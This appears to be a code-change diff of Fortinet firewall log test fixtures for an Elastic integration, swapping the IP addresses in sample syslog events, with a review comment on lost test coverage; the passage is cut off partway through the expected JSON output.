time=12:17:12 devname="testswitch1" devid="somerouterid" logid="1500054000" type="utm" subtype="dns" eventtype="dns-query" level="information" vd="root" eventtime=1587230232658642672 tz="-0500" policyid=26 sessionid=543234 
srcip=192.168.2.1 srcport=54788 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=235 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN" -<189>date=2020-04-23 time=13:15:18 devname="testswitch2" devid="someotherid" logid="1700062001" type="utm" subtype="ssl" eventtype="ssl-anomalies" level="notice" vd="root" eventtime=1587230118838592454 tz="-0400" policyid=12 sessionid=42346234 service="HTTPS" user="elasticuser2" group="elasticgroup2" profile="somecerts" srcip=192.168.2.1 srcport=59726 dstip=8.8.4.4 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 action="passthrough" msg="Server certificate passed" reason="untrusted-cert" +<188>date=2020-04-23 time=12:17:48 devname="testswitch1" devid="somerouterid" logid="0316013056" type="utm" subtype="webfilter" eventtype="ftgd_blk" level="warning" vd="root" eventtime=1587230269052907555 tz="-0500" policyid=100602 sessionid=1234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=61930 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="blocked" reqtype="direct" url="/config/" sentbyte=1152 rcvdbyte=1130 direction="outgoing" msg="URL belongs to a denied category in policy" method="domain" cat=76 catdesc="Internet Telephony" +<189>date=2020-04-23 time=01:16:08 devname="testswitch1" devid="somerouterid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="OPERATIONAL" eventtime=1592961368 srcip=10.10.10.10 srcport=60899 srcintf="srcintfname" srcintfrole="lan" dstip=67.43.156.13 dstport=161 dstintf="dstintfname" dstintfrole="lan" sessionid=155313 proto=17 action="deny" policyid=0 policytype="policy" service="SNMP" dstcountry="Reserved" srccountry="Reserved" trandisp="noop" duration=0 sentbyte=0 rcvdbyte=0 sentpkt=0 appcat="unscanned" 
crscore=30 craction=131072 crlevel="high" +<189>date=2020-04-23 time=12:17:45 devname="testswitch1" devid="somerouterid" logid="0317013312" type="utm" subtype="webfilter" eventtype="ftgd_allow" level="notice" vd="root" eventtime=1587230266314799756 tz="-0500" policyid=38 sessionid=543234 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 srcport=65236 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=443 dstintf="wan1" dstintfrole="wan" proto=6 service="HTTPS" hostname="elastic.co" profile="elasticruleset" action="passthrough" reqtype="direct" url="/" sentbyte=3545 rcvdbyte=6812 direction="outgoing" msg="URL belongs to an allowed category in policy" method="domain" cat=23 catdesc="Web-based Email" +<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230255061492894 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=67.43.156.13 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co" +<190>date=2020-04-23 time=13:17:35 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1591788391 tz="-0400" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=67.43.156.13 srcport=59790 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=12 sessionid=453234 applist="elasticruleset" action="pass" 
appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.co" incidentserialno=23465 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="test.elastic.co" +<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="67.43.156.13" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email" +<189>date=2020-04-23 time=12:17:29 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230249360109339 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=53430 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="test" xid=2234 qname="elastic.example.com" qtype="A" qtypeval=1 qclass="IN" ipaddr="67.43.156.13, 67.43.156.13" msg="Domain is monitored" action="pass" cat=23 catdesc="Web-based Email" +<190>date=2020-04-23 time=12:17:11 devname="testswitch1" devid="somerouterid" logid="1059028704" type="utm" subtype="app-ctrl" eventtype="signature" level="information" vd="root" eventtime=1587230232148674303 tz="-0500" appid=40568 user="elasticuser" group="elasticgroup" authserver="elasticauth" srcip=192.168.2.1 dstip=67.43.156.13 srcport=63012 dstport=443 srcintf="port1" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 service="SSL" direction="outgoing" policyid=100602 sessionid=543234 applist="elasticruleset" action="pass" appcat="Web.Client" app="HTTPS.BROWSER" hostname="elastic.no" incidentserialno=54323 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" 
+<189>date=2020-04-23 time=12:17:04 devname="testswitch1" devid="somerouterid" logid="1501054802" type="utm" subtype="dns" eventtype="dns-response" level="notice" vd="root" eventtime=1587230224712900694 tz="-0500" policyid=26 sessionid=5432 srcip=192.168.2.1 srcport=54438 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=2352 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN" ipaddr="67.43.156.13" msg="Domain is monitored" action="pass" cat=93 catdesc="Remote Access" +<190>date=2020-04-23 time=12:17:12 devname="testswitch1" devid="somerouterid" logid="1500054000" type="utm" subtype="dns" eventtype="dns-query" level="information" vd="root" eventtime=1587230232658642672 tz="-0500" policyid=26 sessionid=543234 srcip=192.168.2.1 srcport=54788 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" proto=17 profile="elastictest" xid=235 qname="elastic.co" qtype="A" qtypeval=1 qclass="IN" +<189>date=2020-04-23 time=13:15:18 devname="testswitch2" devid="someotherid" logid="1700062001" type="utm" subtype="ssl" eventtype="ssl-anomalies" level="notice" vd="root" eventtime=1587230118838592454 tz="-0400" policyid=12 sessionid=42346234 service="HTTPS" user="elasticuser2" group="elasticgroup2" profile="somecerts" srcip=192.168.2.1 srcport=59726 dstip=67.43.156.13 dstport=443 srcintf="LAN" srcintfrole="lan" dstintf="wan1" dstintfrole="wan" proto=6 action="passthrough" msg="Server certificate passed" reason="untrusted-cert" <189>date=2020-04-23 time=12:32:48 devname="testswitch3" devid="someotherrouteridagain" logid="0102043014" type="event" subtype="user" level="notice" vd="root" eventtime=1587231168439640874 tz="-0500" logdesc="FSSO logon authentication status" srcip=10.10.10.10 user="elasticouser" server="elasticserver" action="FSSO-logon" msg="FSSO-logon event from FSSO_elasticserver: user elasticouser logged on 10.10.10.10" -<187>date=2020-04-23 
time=12:32:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101037124" type="event" subtype="vpn" level="error" vd="root" eventtime=1587231168339114138 tz="-0500" logdesc="IPsec phase 1 error" msg="IPsec phase 1 error" action="negotiate" remip=8.8.4.4 locip=8.8.8.8 remport=500 locport=500 outintf="wan2" cookies="345hkjhdrs87/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="N/A" status="negotiate_error" reason="peer SA proposal not match local policy" peer_notif="NOT-APPLICABLE" -<189>date=2020-04-23 time=12:32:31 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231151628960857 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=8.4.5.4 locip=9.9.9.9 remport=500 locport=500 outintf="wan1" cookies="df868dsg876d/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="elasticvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" +<187>date=2020-04-23 time=12:32:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101037124" type="event" subtype="vpn" level="error" vd="root" eventtime=1587231168339114138 tz="-0500" logdesc="IPsec phase 1 error" msg="IPsec phase 1 error" action="negotiate" remip=67.43.156.13 locip=67.43.156.13 remport=500 locport=500 outintf="wan2" cookies="345hkjhdrs87/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="N/A" status="negotiate_error" reason="peer SA proposal not match local policy" peer_notif="NOT-APPLICABLE" +<189>date=2020-04-23 time=12:32:31 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231151628960857 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" 
remip=67.43.156.13 locip=67.43.156.13 remport=500 locport=500 outintf="wan1" cookies="df868dsg876d/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="elasticvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" <189>date=2020-04-23 time=14:32:09 devname="testswitch3" devid="someotherrouteridagain" logid="0100040704" type="event" subtype="system" level="notice" vd="root" eventtime=1587231129938795255 tz="-0300" logdesc="System performance statistics" action="perf-stats" cpu=0 mem=10 totalsession=23 disk=0 bandwidth="23/4" setuprate=0 disklograte=0 fazlograte=0 freediskstorage=331 sysuptime=25170 msg="Performance statistics: average CPU: 0, memory: 23, concurrent sessions: 20, setup-rate: 0" <189>date=2020-04-23 time=12:32:09 devname="testswitch3" devid="someotherrouteridagain" logid="0102043039" type="event" subtype="user" level="notice" vd="root" eventtime=1587231130109462858 tz="-0500" logdesc="Authentication logon" srcip=10.10.10.10 user="elastiiiuser" authserver="FSSO_elastiauth" action="auth-logon" status="logon" msg="User elastiiiuser added to auth logon" -<189>date=2020-04-23 time=12:32:00 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231120608961118 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action="negotiate" remip=8.8.5.4 locip=7.6.3.4 remport=500 locport=500 outintf="wan1" cookies="345khj34566/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="testvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" +<189>date=2020-04-23 time=12:32:00 devname="testswitch3" devid="someotherrouteridagain" logid="0101037127" type="event" subtype="vpn" level="notice" vd="root" eventtime=1587231120608961118 tz="-0500" logdesc="Progress IPsec phase 1" msg="progress IPsec phase 
1" action="negotiate" remip=67.43.156.13 locip=67.43.156.14 remport=500 locport=500 outintf="wan1" cookies="345khj34566/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="testvpn" status="success" init="local" mode="main" dir="outbound" stage=1 role="initiator" result="OK" <189>date=2020-04-23 time=14:24:13 devname="testswitch3" devid="someotherrouteridagain" logid="0100041006" type="event" subtype="system" level="notice" vd="root" eventtime=1587230655301863513 tz="-0300" logdesc="FortiSandbox AV database updated" version="1.522479" msg="FortiSandbox AV database updated" <190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0107045057" type="event" subtype="endpoint" level="information" vd="root" eventtime=1587230627558979735 tz="-0500" logdesc="FortiClient connection added" action="add" status="success" license_limit="unlimited" used_for_type=3 connection_type="sslvpn" count=2 user="elastico" ip=172.16.0.2 name="somerouter" fctuid="645234fdd01F885824F764" msg="Add a FortiClient Connection." 
-<190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039943" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627334405765 tz="-0500" logdesc="SSL VPN new connection" action="ssl-new-con" tunneltype="ssl" tunnelid=2 remip=8.8.8.6 user="N/A" group="N/A" dst_host="N/A" reason="N/A" msg="SSL new connection" -<190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039947" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627698970007 tz="-0500" logdesc="SSL VPN tunnel up" action="tunnel-up" tunneltype="ssl-tunnel" tunnelid=2345 remip=8.8.5.4 tunnelip=10.10.10.10 user="someuser" group="somegroup" dst_host="N/A" reason="tunnel established" msg="SSL tunnel established" +<190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039943" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627334405765 tz="-0500" logdesc="SSL VPN new connection" action="ssl-new-con" tunneltype="ssl" tunnelid=2 remip=67.43.156.13 user="N/A" group="N/A" dst_host="N/A" reason="N/A" msg="SSL new connection" +<190>date=2020-04-23 time=12:23:47 devname="testswitch3" devid="someotherrouteridagain" logid="0101039947" type="event" subtype="vpn" level="information" vd="root" eventtime=1587230627698970007 tz="-0500" logdesc="SSL VPN tunnel up" action="tunnel-up" tunneltype="ssl-tunnel" tunnelid=2345 remip=67.43.156.13 tunnelip=10.10.10.10 user="someuser" group="somegroup" dst_host="N/A" reason="tunnel established" msg="SSL tunnel established" <189>date=2020-04-23 time=14:16:42 devname="testswitch3" devid="someotherrouteridagain" logid="0102043015" type="event" subtype="user" level="notice" vd="root" eventtime=1587230204674924332 tz="-0300" logdesc="FSSO log off authentication status" srcip=192.168.1.1 user="elasticadmin" server="FSSO_somefssoserver" action="FSSO-logoff" msg="FSSO-logoff event from 
FSSO_somefssoserver: user elasticuser logged off 1192.168.1.1" -<189>date=2020-04-23 time=12:16:02 devname="testswitch3" devid="someotherrouteridagain" logid="0100022915" type="event" subtype="system" level="notice" vd="root" eventtime=1587230163121116383 tz="-0500" logdesc="FortiCloud server connected" server="9.9.9.9" action="connect" msg="FortiCloud 9.9.9.9 server is connected" +<189>date=2020-04-23 time=12:16:02 devname="testswitch3" devid="someotherrouteridagain" logid="0100022915" type="event" subtype="system" level="notice" vd="root" eventtime=1587230163121116383 tz="-0500" logdesc="FortiCloud server connected" server="67.43.156.13" action="connect" msg="FortiCloud 67.43.156.13 server is connected" <189>date=2020-04-23 time=12:16:02 devname="testswitch3" devid="someotherrouteridagain" logid="0100022913" type="event" subtype="system" level="notice" vd="root" eventtime=1587230163375149856 tz="-0500" logdesc="FortiCloud server disconnected" server="4.4.4.4" action="disconnect" reason="connection reset" msg="FortiCloud 4.4.4.4 server is disconnected" -<188>date=2020-04-23 time=12:14:09 devname="newfirewall" devid="newrouterid" logid="0000000011" type="traffic" subtype="forward" level="warning" vd="root" eventtime=1587230049761513222 tz="-0500" srcip=192.168.1.6 srcport=53438 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=53 dstintf="wan1" dstintfrole="wan" sessionid=435234 proto=17 action="dns" policyid=26 policytype="policy" poluuid="2345de-b143-52134d8-6654f-4654sdfg16f431" policyname="elasticnewruleset" service="DNS" dstcountry="Netherlands" srccountry="Reserved" appcat="unscanned" crscore=5 craction=54144 crlevel="low" -<189>date=2020-04-23 time=12:11:51 devname="newfirewall" devid="newrouterid" logid="0000000020" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587229911390385486 tz="-0500" srcip=192.168.10.10 srcport=6000 srcintf="port1" srcintfrole="lan" dstip=8.6.4.7 dstport=6000 dstintf="wan1" dstintfrole="wan" 
sessionid=4352 proto=17 action="accept" policyid=3426 policytype="policy" poluuid="1765de8-5a13-765da73fdsfa1c" policyname="newruleelastic" service="portname" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=123.123.123.123 transport=60964 appcat="unknown" applist="policylist" duration=5462 sentbyte=438650 rcvdbyte=65446 sentpkt=723417 rcvdpkt=1045601 vwlid=0 sentdelta=576 rcvddelta=728 -<189>date=2020-04-23 time=12:11:48 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229908751434997 tz="-0500" srcip=2001:4860:4860::8888 identifier=0 srcintf="port1" srcintfrole="lan" dstip=2001:4860:4860::8888 dstintf="unknown0" dstintfrole="undefined" sessionid=6542345 proto=58 action="accept" policyid=0 policytype="someotherpolicy" service="icmp6/1/0" trandisp="noop" app="icmp6/25/0" duration=42 sentbyte=3014 rcvdbyte=20 sentpkt=4 rcvdpkt=0 appcat="unscanned" -<189>date=2020-04-23 time=13:10:57 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229857509058693 tz="-0400" srcip=9.7.7.7 identifier=61 srcintf="wan1" srcintfrole="wan" dstip=8.8.8.8 dstintf="unknown0" dstintfrole="undefined" sessionid=123 proto=1 action="accept" policyid=0 policytype="rulepolicy" service="PING" dstcountry="Norway" srccountry="Netherlands" trandisp="noop" app="PING" duration=20 sentbyte=0 rcvdbyte=10 sentpkt=0 rcvdpkt=40 appcat="unscanned" +<188>date=2020-04-23 time=12:14:09 devname="newfirewall" devid="newrouterid" logid="0000000011" type="traffic" subtype="forward" level="warning" vd="root" eventtime=1587230049761513222 tz="-0500" srcip=192.168.1.6 srcport=53438 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=53 dstintf="wan1" dstintfrole="wan" sessionid=435234 proto=17 action="dns" policyid=26 policytype="policy" poluuid="2345de-b143-52134d8-6654f-4654sdfg16f431" policyname="elasticnewruleset" 
service="DNS" dstcountry="Netherlands" srccountry="Reserved" appcat="unscanned" crscore=5 craction=54144 crlevel="low" +<189>date=2020-04-23 time=12:11:51 devname="newfirewall" devid="newrouterid" logid="0000000020" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587229911390385486 tz="-0500" srcip=192.168.10.10 srcport=6000 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=6000 dstintf="wan1" dstintfrole="wan" sessionid=4352 proto=17 action="accept" policyid=3426 policytype="policy" poluuid="1765de8-5a13-765da73fdsfa1c" policyname="newruleelastic" service="portname" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=67.43.156.14 transport=60964 appcat="unknown" applist="policylist" duration=5462 sentbyte=438650 rcvdbyte=65446 sentpkt=723417 rcvdpkt=1045601 vwlid=0 sentdelta=576 rcvddelta=728 +<189>date=2020-04-23 time=12:11:48 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229908751434997 tz="-0500" srcip=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 identifier=0 srcintf="port1" srcintfrole="lan" dstip=2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 dstintf="unknown0" dstintfrole="undefined" sessionid=6542345 proto=58 action="accept" policyid=0 policytype="someotherpolicy" service="icmp6/1/0" trandisp="noop" app="icmp6/25/0" duration=42 sentbyte=3014 rcvdbyte=20 sentpkt=4 rcvdpkt=0 appcat="unscanned" +<189>date=2020-04-23 time=13:10:57 devname="newfirewall" devid="newrouterid" logid="0001000014" type="traffic" subtype="local" level="notice" vd="root" eventtime=1587229857509058693 tz="-0400" srcip=67.43.156.13 identifier=61 srcintf="wan1" srcintfrole="wan" dstip=67.43.156.13 dstintf="unknown0" dstintfrole="undefined" sessionid=123 proto=1 action="accept" policyid=0 policytype="rulepolicy" service="PING" dstcountry="Norway" srccountry="Netherlands" trandisp="noop" app="PING" duration=20 sentbyte=0 rcvdbyte=10 sentpkt=0 rcvdpkt=40 appcat="unscanned" 
<188>date=2020-04-23 time=12:14:39 devname="firewall3" devid="oldfwid" logid="0000000011" type="traffic" subtype="forward" level="warning" vd="root" eventtime=1587230079841464445 tz="-0500" srcip=192.168.1.1 srcport=62493 srcintf="port1" srcintfrole="lan" dstip=192.168.100.100 dstport=1235 dstintf="newinterface" dstintfrole="undefined" sessionid=54234 proto=17 action="ip-conn" policyid=49 policytype="policy" poluuid="654cc-b6542-53467u8-e45234-1566casd35f7836" policyname="oldpolicyname" user="elasticsuper" authserver="FSSO_newfsso" service="udp/12302" dstcountry="Reserved" srccountry="Reserved" appcat="unscanned" crscore=5 craction=63332144 crlevel="low" -<189>date=2020-04-23 time=12:14:28 devname="firewall3" devid="oldfwid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587230069291463928 tz="-0500" srcip=192.168.50.50 srcport=56603 srcintf="port1" srcintfrole="lan" dstip=8.8.8.8 dstport=442 dstintf="wan1" dstintfrole="wan" sessionid=2345 proto=6 action="close" policyid=2365 policytype="policy" poluuid="654644c-b064-fdgdf3425-f003-1234ghdf682e05f" policyname="someoldpolicyname" user="elasticuser" group="testgroup" authserver="FSSO_something" service="HTTPS" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=23.23.23.23 transport=603 appid=43540 app="Skype.Portals" appcat="Collaboration" apprisk="elevated" applist="someapplist" appact="detected" duration=126 sentbyte=923 rcvdbyte=77654 sentpkt=113 rcvdpkt=70 vwlid=4 vwlquality="Seq_num(3), alive, selected" wanin=1130 wanout=6671 lanin=1406 lanout=146506 utmaction="block" countweb=1 countapp=1 crscore=5 craction=6144 crlevel="low" -<190>date=2019-05-15 time=18:03:36 logid="1059028704" type="utm" subtype="app-ctrl" eventtype="app-ctrl-all" level="information" vd="root" eventtime=1557968615 appid=40568 srcip=10.1.100.22 dstip=195.8.215.136 srcport=50798 dstport=443 srcintf="port10" srcintfrole="lan" dstintf="port9" dstintfrole="wan" proto=6 service="HTTPS" 
direction="outgoing" policyid=1 sessionid=4414 applist="block-social.media" appcat="Web.Client" app="HTTPS.BROWSER" action="pass" hostname="www.dailymotion.com" incidentserialno=1962906680 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="*.dailymotion.com" scertissuer="DigiCert SHA2 High Assurance Server CA" -<190>date=2020-11-02 time=08:11:38 devname=testfirewall devid=newrouterid logid=0101037127 type="event" subtype=vpn level=notice vd=root logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action=negotiate remip=8.8.8.8 locip=10.10.10.10 remport=500 locport=500 outintf="port1" cookies="125cbf9ee8349965/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="P1_Test" status=success init=local mode=aggressive dir=outbound stage=1 role=initiator result=OK +<189>date=2020-04-23 time=12:14:28 devname="firewall3" devid="oldfwid" logid="0000000013" type="traffic" subtype="forward" level="notice" vd="root" eventtime=1587230069291463928 tz="-0500" srcip=192.168.50.50 srcport=56603 srcintf="port1" srcintfrole="lan" dstip=67.43.156.13 dstport=442 dstintf="wan1" dstintfrole="wan" sessionid=2345 proto=6 action="close" policyid=2365 policytype="policy" poluuid="654644c-b064-fdgdf3425-f003-1234ghdf682e05f" policyname="someoldpolicyname" user="elasticuser" group="testgroup" authserver="FSSO_something" service="HTTPS" dstcountry="Netherlands" srccountry="Reserved" trandisp="snat" transip=67.43.156.14 transport=603 appid=43540 app="Skype.Portals" appcat="Collaboration" apprisk="elevated" applist="someapplist" appact="detected" duration=126 sentbyte=923 rcvdbyte=77654 sentpkt=113 rcvdpkt=70 vwlid=4 vwlquality="Seq_num(3), alive, selected" wanin=1130 wanout=6671 lanin=1406 lanout=146506 utmaction="block" countweb=1 countapp=1 crscore=5 craction=6144 crlevel="low" +<190>date=2019-05-15 time=18:03:36 logid="1059028704" type="utm" subtype="app-ctrl" eventtype="app-ctrl-all" level="information" vd="root" 
eventtime=1557968615 appid=40568 srcip=10.1.100.22 dstip=67.43.156.14 srcport=50798 dstport=443 srcintf="port10" srcintfrole="lan" dstintf="port9" dstintfrole="wan" proto=6 service="HTTPS" direction="outgoing" policyid=1 sessionid=4414 applist="block-social.media" appcat="Web.Client" app="HTTPS.BROWSER" action="pass" hostname="www.dailymotion.com" incidentserialno=1962906680 url="/" msg="Web.Client: HTTPS.BROWSER," apprisk="medium" scertcname="*.dailymotion.com" scertissuer="DigiCert SHA2 High Assurance Server CA" +<190>date=2020-11-02 time=08:11:38 devname=testfirewall devid=newrouterid logid=0101037127 type="event" subtype=vpn level=notice vd=root logdesc="Progress IPsec phase 1" msg="progress IPsec phase 1" action=negotiate remip=67.43.156.13 locip=10.10.10.10 remport=500 locport=500 outintf="port1" cookies="125cbf9ee8349965/0000000000000000" user="N/A" group="N/A" xauthuser="N/A" xauthgroup="N/A" assignip=N/A vpntunnel="P1_Test" status=success init=local mode=aggressive dir=outbound stage=1 role=initiator result=OK <190>devname="firewall" devid="FG201EEF34CD12AB" vd="root" date=2021-05-07 time=08:31:14 eventtime=1620372674880370858 tz="+0100" logid="0112053203" type="event" subtype="connector" level="information" logdesc="Dynamic address updated" fctemssn="FCTEMS0000011111" addr="FCTEMS0000011111_AV-Running" msg="Updated tag FCTEMS0000011111_AV-Running." <190>devname="firewall" devid="FG201EEF34CD12AB" vd="root" date=2021-05-07 time=08:31:14 eventtime=1620372674880455433 tz="+0100" logid="0112053203" type="event" subtype="connector" level="information" logdesc="Dynamic address updated" fctemssn="FCTEMS0000011111" addr="MAC_FCTEMS0000011111_AV-Running" msg="Updated tag MAC_FCTEMS0000011111_AV-Running." 
<190>devname="firewall" devid="FG201EEF34CD12AB" vd="root" date=2021-05-07 time=08:31:14 eventtime=1620372674880744919 tz="+0100" logid="0112053203" type="event" subtype="connector" level="information" logdesc="Dynamic address updated" fctemssn="FCTEMS0000011111" addr="FCTEMS0000011111_Connected-to-EMS" msg="Updated tag FCTEMS0000011111_Connected-to-EMS." diff --git a/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log-expected.json b/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log-expected.json index 5e14315d3bf..abd66fda118 100644 --- a/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log-expected.json +++ b/packages/fortinet/data_stream/firewall/_dev/test/pipeline/test-fortinet.log-expected.json @@ -5,24 +5,9 @@ "level": "warning" }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 15169, - "organization": { - "name": "Google LLC" - } - }, "port": 443, "bytes": 1130, - "ip": "8.8.8.8" + "ip": "67.43.156.13" }, "rule": { "ruleset": "elasticruleset", @@ -81,7 +66,7 @@ ], "ip": [ "192.168.2.1", - "8.8.8.8" + "67.43.156.13" ] }, "fortinet": { 
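Review bot: The second dns-response event now reads `ipaddr="67.43.156.13, 67.43.156.13"`, so the multi-address case it existed for (the removed line carried two distinct addresses) no longer shows that the pipeline yields two separate entries rather than one de-duplicated value; `ipaddr="67.43.156.13, 67.43.156.14"` keeps that coverage, and 67.43.156.14 is already used for `transip` elsewhere in this file. The same collapse hits the first two IPsec phase-1 events (`remip=67.43.156.13 locip=67.43.156.13`) and the PING event, where srcip and dstip are both 67.43.156.13 while srccountry/dstcountry still differ, whereas the third phase-1 event already keeps the sides apart with `locip=67.43.156.14`; distinct src/dst values are what lets the fixture catch a swapped field mapping. The unchanged FortiCloud disconnect event still carries `server="4.4.4.4"`, which presumably lies outside the supported subset as well. Separately, the regenerated expected output in this commit drops `destination.geo`/`destination.as` for 67.43.156.13 instead of replacing them, so geo/AS enrichment is no longer covered by this fixture — worth confirming that is intended.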
@@ -100,8 +85,8 @@ } }, "event": { - "ingested": "2021-06-29T09:32:55.133566500Z", - "original": "\u003c188\u003edate=2020-04-23 time=12:17:48 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0316013056\" type=\"utm\" subtype=\"webfilter\" eventtype=\"ftgd_blk\" level=\"warning\" vd=\"root\" eventtime=1587230269052907555 tz=\"-0500\" policyid=100602 sessionid=1234 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 srcport=61930 srcintf=\"port1\" srcintfrole=\"lan\" dstip=8.8.8.8 dstport=443 dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" hostname=\"elastic.co\" profile=\"elasticruleset\" action=\"blocked\" reqtype=\"direct\" url=\"/config/\" sentbyte=1152 rcvdbyte=1130 direction=\"outgoing\" msg=\"URL belongs to a denied category in policy\" method=\"domain\" cat=76 catdesc=\"Internet Telephony\"", + "ingested": "2021-12-09T13:37:22.357746800Z", + "original": "\u003c188\u003edate=2020-04-23 time=12:17:48 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0316013056\" type=\"utm\" subtype=\"webfilter\" eventtype=\"ftgd_blk\" level=\"warning\" vd=\"root\" eventtime=1587230269052907555 tz=\"-0500\" policyid=100602 sessionid=1234 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 